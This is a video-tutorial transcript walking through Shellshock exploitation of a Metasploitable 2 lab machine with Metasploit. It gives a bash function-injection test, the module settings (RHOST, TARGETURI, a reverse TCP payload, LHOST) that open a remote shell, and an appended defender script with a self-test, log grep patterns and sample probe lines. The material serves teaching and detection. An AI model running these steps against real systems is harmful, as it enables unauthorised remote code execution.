Hey guys. So in this video I want to show you how you can exploit the Shellshock vulnerability using Metasploit Framework. The Shellshock vulnerability is also called the bash vulnerability, because it's primarily based on bash. What it exactly is: if your system's bash shell is vulnerable, it's most likely that you're also prone to this Shellshock vulnerability. It works by allowing an attacker to append commands to function definitions and the values of environment variables. So this would be classified as a type of code injection attack, because, you know, you're injecting, you're putting code in there. And since bash processes commands after the function definition, pretty much any arbitrary code that is after that function definition will be executed.
So it's a classic example of an ACE vulnerability, arbitrary code execution. You can easily check if a machine is vulnerable to this bash bug by typing some simple commands. So for this video, I picked Metasploitable 2 again to check whether it is vulnerable to this or not. So I'm going to open it up. Let's go to VirtualBox, which is actually open. So let's go over there.
I'm going to type a simple command to test if it's vulnerable or not. So let's open up a function, and I'm just going to put a colon there and close it back up. And then I'm just going to put some other command after the function definition, like echo hacked. And then, let's say, bash -c. So basically what I'm doing here is that I created a function, and then I have a colon in there. The colon is a built-in that performs no action, which is perfect for us.
Because we don't want our function to do anything, we just want the code after the function, which is echo hacked, to be executed. This colon is basically used where a non-empty command is required. And this bash -c creates an instance of bash that runs this colon and just exits. That's basically what's happening here. So if my code is right, and if the bash of the target machine is vulnerable, I should get something like "hacked" as my output. Let's see. Perfect.
So as you can see, the bash shell of this particular target machine, Metasploitable 2, is vulnerable as well. That means it's also vulnerable to a Shellshock exploit. My next step would be to create an executable script on our target machine, so that it could be executed from our attack machine. So let's do that. Let's go to /usr, cgi-bin.
So that's where you can save scripts and execute and access them externally from a browser. So I'm just going to go to cgi-bin. Okay. And open it up and let me do... Let's create something.
I mean, let's create, let's say, hacked.sh. Let's set it up. All right, so I'm going to do just some simple text file, which would pull up an HTML file that would just say hello, yeah, so let's do something like that. So I'm going to create a bash script. Just the basic stuff. So just go with #!/bin/bash.
And then I'm going to code. This is going to be the content type, which in this case is going to be text/html, because we want the user to access it from a browser. So Content-type, I'm going to put it as text/html, and just close it. And just echo nothing, and then just echo something, I don't know, let's say hacked again.
So there we go, we have simple code which will execute, or which should display "hacked" on the browser HTML page. So let's exit and save it. Perfect. Now let's give permissions for this particular file. So we're just going to put sudo chmod 755 and our file name. Let's just see if we have it in there.
Now let's go to a web browser and access it. Pretty good. Now let's see what the IP address is, first of all: 192.168.0.149. So let's go to Kali again, go to the browser and try to access this machine. So we're going to try to see if we're able to get this file. I'm going to go 192.168, and I think it was 149. And then I'm just going to type cgi-bin and our file name, which was hacked.
Awesome. So we got it working. So that code is working right there, it's getting executed. Now we need to look for the Shellshock vulnerability. So let's go back to Kali and open Metasploit Framework, which is msfconsole. So once you open that up, we're going to look for this Shellshock and try to find an exploit which would give us a back-and-forth connection. So let's search for shellshock.
We've got plenty. Let's search for something. Let's see what we have here. So yeah, I'm going to get something like an Apache one. Let's hit that, there's an Apache exploit, we got this one.
That works, we can use that. Copy that and then just use it: use, paste. Awesome. And now let's see what options it has, or what we can set up. So we got RHOST; we're going to set that up.
Let's do that real quick: set. And then, oh wait, we also need the target URI, which is the path of the CGI script we just created. So you got to do both: set RHOST as 192.168.0.149, which is our Metasploitable 2 IP address. Once you set that, you set the target URI.
To set the target URI you type set TARGETURI, and it is /cgi-bin/ and the name of the file, which was hacked.sh. And then just enter. So we got our target URI set. And then the next thing you're going to do now is set a payload so that it can have a TCP connection back.
So you can do, let's just say, show payloads. And I'm looking for something that could give me a TCP connection back, right? So I'm going to look for, like, reverse TCP, stuff like that. There's one right here. Yep, that works. We can just use that.
So let's copy that, and then set the payload: set payload and then just paste it. And now we have the payload set. Let's see options again, just in case we're missing something. Yep, we are.
So we got to figure out... we gotta set our LHOST. So let me just open up another tab and see... 148, awesome. So set LHOST to 192.168.0.148. That's it. All you got to do now is just, let's check.
Let's check it out as well: check. It is vulnerable. Awesome. So it tells you that it is vulnerable. All you got to do is just exploit, or you can also use the run command, whatever you want to use. There you go.
So we successfully exploited it. A command shell is open. If you type something like id, it should show you what you have. And you can type commands to give you the data and stuff. You can type pwd, that will give you the path.
There you go. So you're able to exploit the Shellshock vulnerability with Metasploit Framework. Hope you enjoyed this video. See you in the next one.
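As a defender-side companion to the bash test and the cgi-bin setup in the video, here is an added example that is not part of the video or of Metasploit: it wraps the same env-function self-test into a status check, and reviews web-server access logs for the `() {` header signature that a Shellshock attempt against a CGI script leaves behind. The log lines, IP addresses and the hacked.sh script name are constructed sample data.

```shell
#!/bin/sh
# Added example (not from the video): defender-side checks for Shellshock.
# Works in POSIX sh; bash is only needed by the self-test itself.

# 1. Self-test of the local bash: the same env-function trick the video types
#    by hand, wrapped in a function that reports a status word:
#    "vulnerable", "patched", or "no-bash" (bash not installed).
shellshock_local_check() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    # A vulnerable bash imports x as a function and runs the trailing echo;
    # a patched bash leaves the variable alone and prints nothing.
    out=$(env x='() { :;}; echo SHELLSHOCK_MARKER' bash -c 'true' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo vulnerable ;;
        *)                   echo patched ;;
    esac
}

# 2. Log review. Apache hands request headers to CGI scripts as environment
#    variables (HTTP_USER_AGENT, HTTP_REFERER, ...), so a Shellshock attempt
#    against a /cgi-bin/ script leaves the "() {" function prefix inside the
#    quoted Referer or User-Agent fields of the access log.
#    Reads log lines on stdin, prints the number of suspicious lines.
shellshock_log_hits() {
    grep -Ec '\(\)[[:space:]]*\{' || true
}

# Same pattern, but prints the unique source addresses (first field).
shellshock_log_sources() {
    grep -E '\(\)[[:space:]]*\{' | awk '{ print $1 }' | sort -u
}

# Constructed sample access log (combined format). Lines 2 and 3 carry the
# probe from the video's own test string; IPs and script name are made up.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [10/Oct/2014:12:00:00 +0000] "GET /cgi-bin/hacked.sh HTTP/1.1" 200 23 "-" "Mozilla/5.0"
192.0.2.20 - - [10/Oct/2014:12:00:05 +0000] "GET /cgi-bin/hacked.sh HTTP/1.1" 200 23 "-" "() { :;}; echo hacked"
192.0.2.21 - - [10/Oct/2014:12:00:09 +0000] "GET /cgi-bin/hacked.sh HTTP/1.1" 200 23 "() { :; }; echo hacked" "curl/7.35.0"
192.0.2.21 - - [10/Oct/2014:12:00:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.35.0"
EOF
}

# Stand-alone run: report local status and review the sample log.
echo "local bash: $(shellshock_local_check)"
echo "suspicious requests: $(sample_log | shellshock_log_hits)"
echo "from: $(sample_log | shellshock_log_sources | tr '\n' ' ')"
```

Point the log functions at a real file with `shellshock_log_sources < /var/log/apache2/access.log` (path assumed; adjust for your distribution).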